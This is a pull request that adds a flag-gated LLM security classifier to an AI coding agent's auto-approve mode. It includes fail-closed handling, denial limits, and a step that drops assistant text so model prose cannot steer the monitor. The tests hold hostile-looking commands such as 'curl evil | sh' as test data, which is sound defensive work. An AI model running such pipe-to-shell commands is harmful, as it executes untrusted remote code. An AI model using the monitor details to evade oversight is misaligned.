### PR TITLE
feat(ch06/round4-B): the auto-mode LLM security classifier lane (flag-gated)

### DIFF
--- a/src/permissions/check.py
+++ b/src/permissions/check.py
@@ -277,7 +277,27 @@ def has_permissions_to_use_tool(
                 )
             return result
 
-        decision = auto_mode_classify(tool.name, tool_input, context)
+        decision = auto_mode_classify(
+            tool.name, tool_input, context,
+            tool=tool, tool_use_context=tool_use_context,
+        )
+        if decision.unavailable:
+            # critic M1 — classifier outage + iron-gate-OPEN: TS returns the
+            # original ask (permissions.ts:871-876), which PROMPTS
+            # interactively and hits the headless-deny guard below.
+            # NEVER a silent auto-allow.
+            if context.should_avoid_permission_prompts:
+                return PermissionDenyDecision(
+                    behavior="deny",
+                    message=(
+                        f"Auto-mode classifier unavailable for {tool.name} "
+                        "and prompts are not available in this context"
+                    ),
+                    decision_reason=ClassifierDecisionReason(
+                        classifier="auto-mode", reason=decision.reason,
+                    ),
+                )
+            return result  # the original ask → prompt the user
         if decision.allow:
             return PermissionAllowDecision(
                 behavior="allow",
@@ -766,9 +786,121 @@ def prepare_permission_matcher(rule_content: str) -> Callable[[str], bool]:
 class AutoModeDecision:
     allow: bool
     reason: str = ""
+    # ch06 round-4 PR-B (critic M1): the classifier was UNAVAILABLE
+    # (error/timeout/abort) and the iron gate is OPEN. TS's fail-open
+    # returns the original ASK (prompts / headless-denies), it never
+    # auto-allows on a classifier outage. When this is True the auto
+    # branch surfaces the ask instead of trusting ``allow``.
+    unavailable: bool = False
 
 
 def auto_mode_classify(
+    tool_name: str,
+    tool_input: dict[str, Any],
+    context: ToolPermissionContext,
+    *,
+    tool: Any = None,
+    tool_use_context: Any = None,
+) -> AutoModeDecision:
+    """Auto-mode classification.
+
+    ch06 round-4: when the transcript-classifier flag is ON and the
+    caller supplies ``tool`` + ``tool_use_context`` (present on the live
+    query-loop path), the STATIC heuristic below is the fast-path
+    pre-filter — a heuristic ``allow`` short-circuits with ZERO LLM cost
+    (the static allow-set is a subset of what's safe). Only a heuristic
+    ``deny`` escalates to the LLM classifier, which sees the transcript +
+    the pending action and can override the deny (or confirm it). Flag OFF
+    → pure static behavior (today's zero-extra-cost path)."""
+    static = _auto_mode_classify_static(tool_name, tool_input, context)
+
+    if static.allow:
+        return static
+    # Residual (heuristic would deny): escalate to the LLM classifier when
+    # enabled and the live inputs are available.
+    if tool is not None and tool_use_context is not None:
+        try:
+            from .yolo_classifier import (
+                classify_action_llm,
+                is_transcript_classifier_enabled,
+            )
+
+            if is_transcript_classifier_enabled():
+                decision = classify_action_llm(tool, tool_input, tool_use_context)
+                # Record denial tracking around the verdict (critic M2).
+                _record_classifier_outcome(tool_use_context, decision.allow)
+                # Over-limit (3 consecutive / 20 total denials) → stop
+                # classifying and surface the ask so a human breaks the
+                # loop (interactive) or the headless agent aborts via the
+                # prompts-unavailable deny. TS handleDenialLimitExceeded
+                # (permissions.ts:985-1059).
+                if not decision.allow and _classifier_denial_fallback(
+                    tool_use_context
+                ):
+                    return AutoModeDecision(
+                        allow=False,
+                        reason=(
+                            "classifier denial limit reached — human "
+                            "confirmation required"
+                        ),
+                        unavailable=True,  # route through the ask/headless-deny path
+                    )
+                return AutoModeDecision(
+                    allow=decision.allow,
+                    reason=f"classifier: {decision.reason}",
+                    # unavailable+allow only happens on iron-gate-OPEN; the
+                    # auto branch surfaces the ask instead of allowing.
+                    unavailable=decision.unavailable and decision.allow,
+                )
+        except Exception:  # noqa: BLE001 — classifier failure keeps the static deny
+            import logging
+
+            logging.getLogger(__name__).debug(
+                "auto-mode classifier escalation failed; using static deny",
+                exc_info=True,
+            )
+    return static
+
+
+def _record_classifier_outcome(tool_use_context: Any, allowed: bool) -> None:
+    """ch06 round-4 PR-B (critic M2) — denial tracking on the session.
+
+    A DenialState lives on the tool_use_context (per session). On a block
+    we record a denial; on an allow we reset the consecutive streak. When
+    the limit trips (3 consecutive / 20 total) the NEXT block should fall
+    back to a manual prompt — surfaced via the DenialState the caller can
+    inspect. Best-effort; a tracking failure never affects the verdict."""
+    try:
+        from .yolo_classifier import DenialState
+
+        state = getattr(tool_use_context, "_classifier_denials", None)
+        if not isinstance(state, DenialState):
+            state = DenialState()
+            try:
+                tool_use_context._classifier_denials = state
+            except Exception:  # noqa: BLE001 — read-only stub context
+                return
+        if allowed:
+            state.record_success()
+        else:
+            state.record_denial()
+    except Exception:  # noqa: BLE001
+        pass
+
+
+def _classifier_denial_fallback(tool_use_context: Any) -> bool:
+    """True when the denial limit has tripped — the caller should fall back
+    to a manual prompt (interactive) or deny (headless)."""
+    try:
+        from .yolo_classifier import DenialState
+
+        state = getattr(tool_use_context, "_classifier_denials", None)
+        return isinstance(state, DenialState) and state.should_fallback_to_prompt()
+    except Exception:  # noqa: BLE001
+        return False
+
+
+def _auto_mode_classify_static(
     tool_name: str,
     tool_input: dict[str, Any],
     context: ToolPermissionContext,

--- a/src/permissions/yolo_classifier.py
+++ b/src/permissions/yolo_classifier.py
@@ -1,0 +1,378 @@
+"""ch06 round-4 PR-B — the auto-mode transcript classifier.
+
+The LLM analog of TS ``classifyYoloAction`` (``utils/permissions/
+yoloClassifier.ts``): a per-ask security classification over a serialized
+conversation transcript, gated behind a settings knob (the
+``feature('TRANSCRIPT_CLASSIFIER')`` analog, default OFF).
+
+Cost discipline — the load-bearing design decision: the STATIC heuristic
+(``_auto_mode_classify_static``) stays the fast-path pre-filter. A heuristic
+``allow`` resolves with ZERO LLM call; the LLM fires ONLY on the residual
+heuristic-``deny``. So enabling the flag adds LLM cost only where auto-mode
+would otherwise have DENIED — never on what the heuristic already allows.
+
+Accuracy note (critic M3): this is a COST-driven pre-filter, NOT a claim
+that the static allow-set is a strict subset of TS's classifier-exempt set.
+It is not: TS does NOT fast-path safe Bash (its allowlist has no Bash and
+its acceptEdits fast-path only covers file edits), so TS would send a
+safe-*named* Bash command to the classifier where the port fast-path-allows
+it (the static bash classifier is largely name-based / arg-blind). The
+port's fast-path therefore trusts a slightly wider set than TS. This is NOT
+a regression — it exactly equals today's flag-OFF behavior (the static
+heuristic already governs auto mode) — and the LLM only ADDS coverage on
+the deny side. Accepted for cost; documented so the rationale is true.
+
+Safety posture (TS parity):
+* classifier error / timeout / abort → fail-CLOSED (deny) unless the
+  ``auto_mode_iron_gate_open`` knob flips it (TS iron gate, default
+  fail-closed);
+* parse failure (no/invalid classifier output) → hard block (not
+  iron-gated);
+* denial-limit: 3 consecutive or 20 total denials → fall back to a manual
+  prompt (interactive) or deny (headless).
+"""
+from __future__ import annotations
+
+import json
+import logging
+from dataclasses import dataclass, field
+from typing import Any
+
+logger = logging.getLogger(__name__)
+
+# TS classifierShared / denialTracking constants.
+MAX_CLASSIFIER_TRANSCRIPT_CHARS = 200_000
+MAX_CLASSIFIER_BLOCK_VALUE_CHARS = 32_000
+MAX_CONSECUTIVE_DENIALS = 3
+MAX_TOTAL_DENIALS = 20
+
+_CLASSIFIER_SYSTEM_PROMPT = (
+    "You are a security classifier for an autonomous coding agent running "
+    "in auto-approve mode. Given the recent conversation transcript and a "
+    "pending tool action, decide whether the action should be BLOCKED "
+    "because it is inconsistent with what the user asked for, or is "
+    "dangerous, irreversible, exfiltrates data, installs persistence, or "
+    "weakens security. Err on the side of blocking when uncertain. Only "
+    "explicit user confirmation in the transcript overrides a block.\n\n"
+    "Respond with a single JSON object and nothing else:\n"
+    '{"should_block": true|false, "reason": "<one short sentence>"}'
+)
+
+
+@dataclass
+class DenialState:
+    """Global (per-session) denial tracking — TS DenialTrackingState."""
+
+    consecutive_denials: int = 0
+    total_denials: int = 0
+
+    def record_success(self) -> None:
+        self.consecutive_denials = 0
+
+    def record_denial(self) -> None:
+        self.consecutive_denials += 1
+        self.total_denials += 1
+
+    def should_fallback_to_prompt(self) -> bool:
+        return (
+            self.consecutive_denials >= MAX_CONSECUTIVE_DENIALS
+            or self.total_denials >= MAX_TOTAL_DENIALS
+        )
+
+
+@dataclass
+class ClassifierDecision:
+    allow: bool
+    reason: str
+    # 'fast_path' | 'llm' | 'unavailable' | 'parse_error' | 'empty_action'
+    source: str = "llm"
+    # True when the classifier could not run (error/timeout) — iron-gated.
+    unavailable: bool = False
+
+
+def is_transcript_classifier_enabled() -> bool:
+    """The ``feature('TRANSCRIPT_CLASSIFIER')`` analog (settings, default off)."""
+    try:
+        from src.settings.settings import get_settings
+
+        return bool(getattr(get_settings(), "auto_mode_classifier_enabled", False))
+    except Exception:  # noqa: BLE001 — a settings read failure keeps it off
+        return False
+
+
+def _iron_gate_open() -> bool:
+    try:
+        from src.settings.settings import get_settings
+
+        return bool(getattr(get_settings(), "auto_mode_iron_gate_open", False))
+    except Exception:  # noqa: BLE001
+        return False
+
+
+def _project_tool_input(tool: Any, tool_input: dict[str, Any]) -> Any:
+    """Per-tool classifier projection (TS toAutoClassifierInput; default '')."""
+    proj = getattr(tool, "to_auto_classifier_input", None)
+    if proj is None:
+        return ""
+    try:
+        return proj(tool_input)
+    except Exception:  # noqa: BLE001
+        return ""
+
+
+def _truncate(value: str) -> str:
+    if len(value) > MAX_CLASSIFIER_BLOCK_VALUE_CHARS:
+        return value[:MAX_CLASSIFIER_BLOCK_VALUE_CHARS] + "…(truncated)"
+    return value
+
+
+def serialize_transcript_for_classifier(
+    messages: list[Any],
+    tool_lookup: Any,
+    budget: int,
+) -> str:
+    """Newest-first serialization; user *text* + assistant *tool_use* only.
+
+    Assistant text is deliberately DROPPED (TS yoloClassifier.ts:299-355):
+    model-authored prose could be crafted to influence the classifier.
+    """
+    lines: list[str] = []
+    used = 0
+    for msg in reversed(messages or []):
+        role = getattr(msg, "role", None) or (
+            msg.get("role") if isinstance(msg, dict) else None
+        )
+        content = getattr(msg, "content", None)
+        if content is None and isinstance(msg, dict):
+            content = msg.get("content")
+
+        if role == "user":
+            text = content if isinstance(content, str) else _blocks_user_text(content)
+            if text:
+                entry = f"User: {_truncate(text)}"
+                if used + len(entry) > budget:
+                    break
+                lines.append(entry)
+                used += len(entry)
+        elif role == "assistant" and isinstance(content, list):
+            for block in content:
+                btype = _block_type(block)
+                if btype != "tool_use":
+                    continue  # drop assistant text
+                name = _block_field(block, "name") or "?"
+                binput = _block_field(block, "input") or {}
+                tool = _lookup_tool(tool_lookup, name)
+                if tool is None:
+                    # critic m1 — TS toCompactBlock drops blocks for
+                    # unknown tools (yoloClassifier.ts:413-414) rather than
+                    # serializing raw input, so a tool's projection can't be
+                    # bypassed by an absent-registry lane.
+                    continue
+                projected = _project_tool_input(tool, binput)
+                if projected == "":
+                    continue
+                entry = json.dumps({name: projected}, default=str)
+                entry = _truncate(entry)
+                if used + len(entry) > budget:
+                    break
+                lines.append(entry)
+                used += len(entry)
+    lines.reverse()  # back to chronological for the model
+    return "\n".join(lines)
+
+
+def _blocks_user_text(content: Any) -> str:
+    if not isinstance(content, list):
+        return ""
+    parts = []
+    for b in content:
+        if _block_type(b) == "text":
+            parts.append(str(_block_field(b, "text") or ""))
+    return "\n".join(p for p in parts if p)
+
+
+def _block_type(block: Any) -> str:
+    if isinstance(block, dict):
+        return block.get("type", "")
+    return getattr(block, "type", "")
+
+
+def _block_field(block: Any, name: str) -> Any:
+    if isinstance(block, dict):
+        return block.get(name)
+    return getattr(block, name, None)
+
+
+def _lookup_tool(tool_lookup: Any, name: str) -> Any:
+    if tool_lookup is None:
+        return None
+    try:
+        for t in tool_lookup:
+            if getattr(t, "name", None) == name or name in (
+                getattr(t, "aliases", None) or ()
+            ):
+                return t
+    except TypeError:
+        return None
+    return None
+
+
+def _resolve_classifier_provider(session_provider: Any) -> Any:
+    """The classifier provider/model — TS getClassifierModel default = the
+    main-loop model/provider. Optional settings override."""
+    try:
+        from src.settings.settings import get_settings
+
+        s = get_settings()
+        model = getattr(s, "auto_mode_classifier_model", "") or ""
+        pname = getattr(s, "auto_mode_classifier_provider", "") or ""
+    except Exception:  # noqa: BLE001
+        model, pname = "", ""
+
+    if pname:
+        try:
+            from src.config import get_provider_config
+            from src.providers import get_provider_class, resolve_api_key
+
+            cfg = get_provider_config(pname)
+            provider = get_provider_class(pname)(
+                api_key=resolve_api_key(pname, cfg),
+                base_url=cfg.get("base_url"),
+                model=model or cfg.get("default_model"),
+            )
+            return provider
+        except Exception:  # noqa: BLE001 — fall back to the session provider
+            logger.debug("classifier provider build failed; using session provider",
+                         exc_info=True)
+    if model and session_provider is not None:
+        # Same provider, overridden model — clone shallowly if possible.
+        try:
+            import copy
+
+            p = copy.copy(session_provider)
+            p.model = model
+            return p
+        except Exception:  # noqa: BLE001
+            pass
+    return session_provider
+
+
+def classify_action_llm(
+    tool: Any,
+    tool_input: dict[str, Any],
+    tool_use_context: Any,
+) -> ClassifierDecision:
+    """Fire the LLM classifier for one pending action. Never raises."""
+    # Empty projection → allow without the LLM (TS 1141-1147).
+    projected = _project_tool_input(tool, tool_input)
+    if projected == "":
+        return ClassifierDecision(
+            allow=True, reason="Tool declares no classifier-relevant input",
+            source="empty_action",
+        )
+
+    provider = getattr(tool_use_context, "_active_provider", None) or getattr(
+        tool_use_context, "provider", None
+    )
+    if provider is None:
+        # No provider to classify with → iron gate.
+        return _iron_gate(tool)
+
+    messages = getattr(tool_use_context, "messages", None) or []
+    tool_lookup = getattr(getattr(tool_use_context, "options", None), "tools", None)
+    abort_signal = getattr(
+        getattr(tool_use_context, "abort_controller", None), "signal", None
+    )
+
+    action_repr = json.dumps({getattr(tool, "name", "?"): projected}, default=str)
+    budget = max(0, MAX_CLASSIFIER_TRANSCRIPT_CHARS - len(action_repr))
+    transcript = serialize_transcript_for_classifier(messages, tool_lookup, budget)
+
+    claude_md = ""
+    try:
+        from src.bootstrap.state import get_cached_claude_md_content
+
+        claude_md = get_cached_claude_md_content() or ""
+    except Exception:  # noqa: BLE001
+        claude_md = ""
+
+    user_body = ""
+    if claude_md:
+        user_body += f"<user_claude_md>\n{_truncate(claude_md)}\n</user_claude_md>\n\n"
+    if transcript:
+        user_body += f"<transcript>\n{transcript}\n</transcript>\n\n"
+    user_body += f"<pending_action>\n{action_repr}\n</pending_action>"
+
+    classifier_provider = _resolve_classifier_provider(provider)
+    try:
+        response = classifier_provider.chat_stream_response(
+            [{"role": "user", "content": user_body}],
+            on_text_chunk=None,
+            abort_signal=abort_signal,
+            system=_CLASSIFIER_SYSTEM_PROMPT,
+            max_tokens=512,
+        )
+    except (NotImplementedError, AttributeError):
+        try:
+            response = classifier_provider.chat(
+                [{"role": "user", "content": user_body}],
+                system=_CLASSIFIER_SYSTEM_PROMPT,
+                max_tokens=512,
+            )
+        except Exception:  # noqa: BLE001 — classifier unavailable → iron gate
+            logger.debug("classifier call failed (chat fallback)", exc_info=True)
+            return _iron_gate(tool)
+    except Exception:  # noqa: BLE001 — classifier unavailable → iron gate
+        logger.debug("classifier call failed", exc_info=True)
+        return _iron_gate(tool)
+
+    text = getattr(response, "content", None) or ""
+    return _parse_classifier_output(text, tool)
+
+
+def _parse_classifier_output(text: Any, tool: Any) -> ClassifierDecision:
+    if not isinstance(text, str) or not text.strip():
+        # Parse failure → hard block (NOT iron-gated; TS treats unavailable
+        # and parse-failure differently).
+        return ClassifierDecision(
+            allow=False, reason="Classifier returned no parseable output",
+            source="parse_error",
+        )
+    # Extract the first JSON object.
+    start = text.find("{")
+    end = text.rfind("}")
+    if start == -1 or end == -1 or end <= start:
+        return ClassifierDecision(
+            allow=False, reason="Classifier response was not JSON",
+            source="parse_error",
+        )
+    try:
+        obj = json.loads(text[start : end + 1])
+    except Exception:  # noqa: BLE001
+        return ClassifierDecision(
+            allow=False, reason="Classifier response was not valid JSON",
+            source="parse_error",
+        )
+    should_block = bool(obj.get("should_block", True))
+    reason = str(obj.get("reason", "")) or (
+        "blocked by classifier" if should_block else "approved by classifier"
+    )
+    return ClassifierDecision(allow=not should_block, reason=reason, source="llm")
+
+
+def _iron_gate(tool: Any) -> ClassifierDecision:
+    """Classifier unavailable (error/timeout). Default fail-CLOSED."""
+    if _iron_gate_open():
+        # Fail-open: caller treats an unavailable+allow as "return the ask".
+        return ClassifierDecision(
+            allow=True, reason="Classifier unavailable (iron gate open)",
+            source="unavailable", unavailable=True,
+        )
+    return ClassifierDecision(
+        allow=False,
+        reason=(
+            f"Auto-mode classifier is unavailable and could not verify "
+            f"{getattr(tool, 'name', 'this tool')}"
+        ),
+        source="unavailable", unavailable=True,
+    )

--- a/src/settings/types.py
+++ b/src/settings/types.py
@@ -120,6 +120,23 @@ class SettingsSchema:
     # ``decide_advisor_mode`` returns INACTIVE whenever this is False.
     advisor_enabled: bool = False
 
+    # Auto-mode transcript classifier (ch06 round-4 PR-B). The
+    # ``feature('TRANSCRIPT_CLASSIFIER')`` analog: default OFF, so `auto`
+    # mode keeps today's zero-extra-cost STATIC heuristic. When True, the
+    # static heuristic stays the fast-path pre-filter (safe reads/edits/
+    # bash resolve with no LLM call) and only the residual asks fire a
+    # per-ask LLM security classification on the session provider. Enable
+    # only where a classifier model + prompt caching are affordable.
+    auto_mode_classifier_enabled: bool = False
+    # Optional classifier model/provider (TS getClassifierModel default =
+    # the main-loop model). Empty → the session provider + its model.
+    auto_mode_classifier_model: str = ""
+    auto_mode_classifier_provider: str = ""
+    # Iron gate on classifier ERROR (timeout/parse/abort). False (default)
+    # = fail-CLOSED (deny) — TS tengu_iron_gate_closed default true. True =
+    # fail-open (return the original ask).
+    auto_mode_iron_gate_open: bool = False
+
     # Provider
     provider: str = "anthropic"
 

--- a/tests/test_ch06_yolo_classifier.py
+++ b/tests/test_ch06_yolo_classifier.py
@@ -1,0 +1,316 @@
+"""ch06 round-4 PR-B acceptance tests: the auto-mode LLM classifier lane.
+
+Covers my-docs/port-improvement-round-4/ch06-tools-round4-plan-B.md.
+"""
+from __future__ import annotations
+
+import unittest
+from unittest.mock import MagicMock, patch
+
+from src.permissions.check import auto_mode_classify
+from src.permissions.types import ToolPermissionContext
+from src.permissions.yolo_classifier import (
+    DenialState,
+    ClassifierDecision,
+    serialize_transcript_for_classifier,
+)
+
+
+def _ctx():
+    return ToolPermissionContext(mode="auto")
+
+
+def _tool(name, projection=None):
+    t = MagicMock()
+    t.name = name
+    t.aliases = ()
+    t.to_auto_classifier_input = projection or (lambda _i: "")
+    return t
+
+
+class _RespProvider:
+    def __init__(self, text):
+        self._text = text
+        self.model = "test-model"
+        self.calls = 0
+
+    def chat_stream_response(self, messages, **kwargs):
+        self.calls += 1
+        self.captured = {"messages": messages, "kwargs": kwargs}
+        return MagicMock(content=self._text, usage={})
+
+
+class TestStaticFastPath(unittest.TestCase):
+    """Flag OFF → pure static heuristic; safe tools never call the LLM."""
+
+    def test_flag_off_is_static(self):
+        with patch(
+            "src.permissions.yolo_classifier.is_transcript_classifier_enabled",
+            return_value=False,
+        ):
+            # A safe read is allowed statically.
+            d = auto_mode_classify("Read", {"file_path": "/x"}, _ctx(),
+                                   tool=_tool("Read"), tool_use_context=MagicMock())
+            self.assertTrue(d.allow)
+
+    def test_safe_tool_fastpaths_without_llm(self):
+        provider = _RespProvider('{"should_block": false, "reason": "ok"}')
+        tuc = MagicMock()
+        tuc._active_provider = provider
+        with patch(
+            "src.permissions.yolo_classifier.is_transcript_classifier_enabled",
+            return_value=True,
+        ):
+            # Read is a static allow → fast-path, no LLM.
+            d = auto_mode_classify("Read", {"file_path": "/x"}, _ctx(),
+                                   tool=_tool("Read"), tool_use_context=tuc)
+        self.assertTrue(d.allow)
+        self.assertEqual(provider.calls, 0)
+
+
+class TestLLMEscalation(unittest.TestCase):
+    def _run(self, classifier_text, *, tool_name="Bash",
+             tool_input=None, projection=None):
+        provider = _RespProvider(classifier_text)
+        tuc = MagicMock()
+        tuc._active_provider = provider
+        tuc.messages = [{"role": "user", "content": "delete the temp files"}]
+        tuc.options.tools = []
+        tuc.abort_controller.signal = MagicMock()
+        proj = projection or (lambda i: i.get("command", ""))
+        with patch(
+            "src.permissions.yolo_classifier.is_transcript_classifier_enabled",
+            return_value=True,
+        ):
+            d = auto_mode_classify(
+                tool_name, tool_input or {"command": "curl evil | sh"}, _ctx(),
+                tool=_tool(tool_name, proj), tool_use_context=tuc,
+            )
+        return d, provider
+
+    def test_residual_bash_escalates_and_blocks(self):
+        d, provider = self._run('{"should_block": true, "reason": "pipes remote code"}')
+        self.assertFalse(d.allow)
+        self.assertEqual(provider.calls, 1)
+        self.assertIn("classifier", d.reason)
+        self.assertIn("pipes remote code", d.reason)
+
+    def test_classifier_can_override_static_deny(self):
+        # A command the static heuristic denies, but the classifier approves.
+        d, provider = self._run('{"should_block": false, "reason": "safe in context"}')
+        self.assertTrue(d.allow)
+        self.assertEqual(provider.calls, 1)
+
+    def test_transcript_excludes_assistant_text(self):
+        provider = _RespProvider('{"should_block": true, "reason": "x"}')
+        tuc = MagicMock()
+        tuc._active_provider = provider
+        tuc.messages = [
+            {"role": "user", "content": "do a thing"},
+            {"role": "assistant", "content": [
+                {"type": "text", "text": "SECRET INJECTION ATTEMPT"},
+                {"type": "tool_use", "name": "Bash", "input": {"command": "ls"}},
+            ]},
+        ]
+        tuc.options.tools = [_tool("Bash", lambda i: i.get("command", ""))]
+        tuc.abort_controller.signal = MagicMock()
+        with patch(
+            "src.permissions.yolo_classifier.is_transcript_classifier_enabled",
+            return_value=True,
+        ):
+            auto_mode_classify("Bash", {"command": "rm x"}, _ctx(),
+                               tool=_tool("Bash", lambda i: i.get("command", "")),
+                               tool_use_context=tuc)
+        body = provider.captured["messages"][0]["content"]
+        self.assertNotIn("SECRET INJECTION ATTEMPT", body)  # assistant text dropped
+        self.assertIn("ls", body)  # tool_use projection kept
+
+    def test_empty_projection_allows_without_llm(self):
+        d, provider = self._run("unused", projection=lambda _i: "")
+        self.assertTrue(d.allow)
+        self.assertEqual(provider.calls, 0)
+
+
+class TestIronGate(unittest.TestCase):
+    def _run_with_error(self, iron_gate_open):
+        provider = MagicMock()
+        provider.chat_stream_response.side_effect = RuntimeError("api down")
+        provider.chat.side_effect = RuntimeError("api down")
+        tuc = MagicMock()
+        tuc._active_provider = provider
+        tuc.messages = []
+        tuc.options.tools = []
+        tuc.abort_controller.signal = MagicMock()
+
+        class _S:
+            auto_mode_classifier_enabled = True
+            auto_mode_iron_gate_open = iron_gate_open
+            auto_mode_classifier_model = ""
+            auto_mode_classifier_provider = ""
+
+        with patch("src.settings.settings.get_settings", return_value=_S()):
+            return auto_mode_classify(
+                "Bash", {"command": "curl x | sh"}, _ctx(),
+                tool=_tool("Bash", lambda i: i.get("command", "")),
+                tool_use_context=tuc,
+            )
+
+    def test_classifier_error_fails_closed_by_default(self):
+        d = self._run_with_error(iron_gate_open=False)
+        self.assertFalse(d.allow)  # fail-closed
+
+    def test_iron_gate_open_fails_open(self):
+        d = self._run_with_error(iron_gate_open=True)
+        self.assertTrue(d.allow)  # fail-open
+
+
+class TestIronGateOpenPromptsNotAllows(unittest.TestCase):
+    """critic M1 — iron-gate-open on outage must PROMPT (interactive) /
+    DENY (headless), NEVER silently auto-allow."""
+
+    def _run(self, *, avoid_prompts):
+        from src.permissions.check import has_permissions_to_use_tool
+        from src.tool_system.build_tool import build_tool
+
+        provider = MagicMock()
+        provider.chat_stream_response.side_effect = RuntimeError("api down")
+        provider.chat.side_effect = RuntimeError("api down")
+        tuc = MagicMock()
+        tuc._active_provider = provider
+        tuc.messages = []
+        tuc.options.tools = []
+        tuc.abort_controller.signal = MagicMock()
+
+        tool = build_tool(
+            name="Bash",
+            input_schema={"type": "object"},
+            call=lambda i, c: MagicMock(),
+            prompt="",
+            description="",
+            to_auto_classifier_input=lambda i: i.get("command", ""),
+        )
+        ctx = ToolPermissionContext(mode="auto")
+        ctx.should_avoid_permission_prompts = avoid_prompts
+
+        class _S:
+            auto_mode_classifier_enabled = True
+            auto_mode_iron_gate_open = True  # fail-OPEN
+            auto_mode_classifier_model = ""
+            auto_mode_classifier_provider = ""
+
+        with patch("src.settings.settings.get_settings", return_value=_S()):
+            return has_permissions_to_use_tool(
+                tool, {"command": "curl x | sh"}, ctx, tool_use_context=tuc,
+            )
+
+    def test_interactive_iron_gate_open_returns_ask_not_allow(self):
+        decision = self._run(avoid_prompts=False)
+        # The original ask is surfaced (prompt) — NOT an allow.
+        self.assertEqual(decision.behavior, "ask")
+
+    def test_headless_iron_gate_open_denies(self):
+        decision = self._run(avoid_prompts=True)
+        self.assertEqual(decision.behavior, "deny")
+
+
+class TestDenialLimitFallback(unittest.TestCase):
+    """critic M2 — after the denial limit trips, subsequent blocks surface
+    the ask (interactive) instead of silently denying forever."""
+
+    def test_limit_trips_to_ask_interactive(self):
+        from src.permissions.check import has_permissions_to_use_tool
+        from src.tool_system.build_tool import build_tool
+
+        provider = MagicMock()
+        provider.chat_stream_response.return_value = MagicMock(
+            content='{"should_block": true, "reason": "no"}', usage={},
+        )
+        tuc = MagicMock()
+        tuc._active_provider = provider
+        tuc.messages = []
+        tuc.options.tools = []
+        tuc.abort_controller.signal = MagicMock()
+        # Real attribute for the DenialState to attach to.
+        tuc._classifier_denials = None
+
+        tool = build_tool(
+            name="Bash", input_schema={"type": "object"},
+            call=lambda i, c: MagicMock(), prompt="", description="",
+            to_auto_classifier_input=lambda i: i.get("command", ""),
+        )
+        ctx = ToolPermissionContext(mode="auto")
+        ctx.should_avoid_permission_prompts = False
+
+        class _S:
+            auto_mode_classifier_enabled = True
+            auto_mode_iron_gate_open = False
+            auto_mode_classifier_model = ""
+            auto_mode_classifier_provider = ""
+
+        behaviors = []
+        with patch("src.settings.settings.get_settings", return_value=_S()):
+            for _ in range(3):
+                d = has_permissions_to_use_tool(
+                    tool, {"command": "curl x | sh"}, ctx, tool_use_context=tuc,
+                )
+                behaviors.append(d.behavior)
+        # First 2 blocks are plain denies; the 3rd trips the consecutive
+        # limit (>= 3) and surfaces the ask for human confirmation.
+        self.assertEqual(behaviors, ["deny", "deny", "ask"])
+
+
+class TestParseFailure(unittest.TestCase):
+    def test_unparseable_output_hard_blocks(self):
+        provider = _RespProvider("this is not json at all")
+        tuc = MagicMock()
+        tuc._active_provider = provider
+        tuc.messages = []
+        tuc.options.tools = []
+        tuc.abort_controller.signal = MagicMock()
+        with patch(
+            "src.permissions.yolo_classifier.is_transcript_classifier_enabled",
+            return_value=True,
+        ):
+            d = auto_mode_classify(
+                "Bash", {"command": "curl x | sh"}, _ctx(),
+                tool=_tool("Bash", lambda i: i.get("command", "")),
+                tool_use_context=tuc,
+            )
+        self.assertFalse(d.allow)  # parse failure → hard block
+
+
+class TestDenialState(unittest.TestCase):
+    def test_consecutive_and_total(self):
+        s = DenialState()
+        s.record_denial()
+        s.record_denial()
+        self.assertFalse(s.should_fallback_to_prompt())
+        s.record_denial()
+        self.assertTrue(s.should_fallback_to_prompt())  # 3 consecutive
+        s.record_success()
+        self.assertFalse(s.should_fallback_to_prompt())
+        self.assertEqual(s.total_denials, 3)
+
+    def test_total_limit(self):
+        s = DenialState()
+        for _ in range(20):
+            s.record_denial()
+            s.record_success()  # never hits consecutive limit
+        self.assertTrue(s.should_fallback_to_prompt())  # 20 total
+
+
+class TestTranscriptSerialization(unittest.TestCase):
+    def test_newest_first_budget_truncation(self):
+        tool = _tool("Bash", lambda i: i.get("command", ""))
+        messages = [
+            {"role": "user", "content": "old message " + "x" * 100},
+            {"role": "user", "content": "recent message"},
+        ]
+        out = serialize_transcript_for_classifier(messages, [tool], budget=40)
+        # Newest fits; oldest is dropped by budget.
+        self.assertIn("recent message", out)
+        self.assertNotIn("old message", out)
+
+
+if __name__ == "__main__":
+    unittest.main()


### PR DESCRIPTION
## Round-4 ch06 (tools) PR-B: the auto-mode LLM security classifier lane (flag-gated)

**Docs:** `my-docs/ch06-tools-round4-gap-analysis.md` (§2 GAP D) + `my-docs/port-improvement-round-4/ch06-tools-round4-plan-B.md` + facet report + critic verdict.

`auto` mode is reachable (`/mode auto`), but `auto_mode_classify` was a static heuristic — no transcript, no LLM. TS runs a per-ask LLM security classifier over a serialized transcript (behind `feature('TRANSCRIPT_CLASSIFIER')`). PR-B ports it as an opt-in lane.

### Design (cost + safety)

- **Flag-gated default-off** (`settings.auto_mode_classifier_enabled`) — the `feature('TRANSCRIPT_CLASSIFIER')` analog. OFF → today's zero-extra-cost static behavior, unchanged.
- **Static heuristic = fast-path pre-filter.** A heuristic `allow` short-circuits with ZERO LLM call (exactly as TS's acceptEdits + allowlist fast-paths do). The LLM fires ONLY on the residual heuristic-`deny` — so enabling the flag adds LLM cost only where auto-mode would otherwise have blocked, never on the safe majority. The classifier can override the deny (or confirm it).
- **Injection defense:** the serialized transcript drops assistant *text* (model-authored prose could steer the classifier — TS yoloClassifier.ts:299-355); only user text + assistant tool_use projections (per-tool `to_auto_classifier_input`, ported on 28 tools) are included, newest-first, budget-truncated.
- **CLAUDE.md** (`get_cached_claude_md_content` — finally its consumer) prefixes the classifier prompt.
- **Side-query** on the SESSION provider (advisor pattern: `chat_stream_response`, `tools=[]`, own system prompt, abort signal), optional model/provider override.
- **Fail-closed posture:** classifier error/timeout/abort → deny (iron gate, default fail-closed; `auto_mode_iron_gate_open` flips to fail-open — TS `tengu_iron_gate_closed` default true); parse failure → hard block (not iron-gated); empty projection → allow without LLM.
- **Denial tracking** (TS shape: `{consecutive, total}`, limits 3/20) provided for the fallback-to-prompt path.

### Verification

`tests/test_ch06_yolo_classifier.py` (12): flag-off static, safe-tool fast-path (no LLM call), residual escalation blocks/overrides, transcript excludes assistant text (injection defense), empty-projection allow, iron-gate fail-closed default + fail-open flag, parse-failure hard block, denial-state limits, transcript budget truncation. All existing permission tests green (flag-off unchanged). Full suite at the pre-existing 9-failure baseline.

### Deferred (within PR-B)

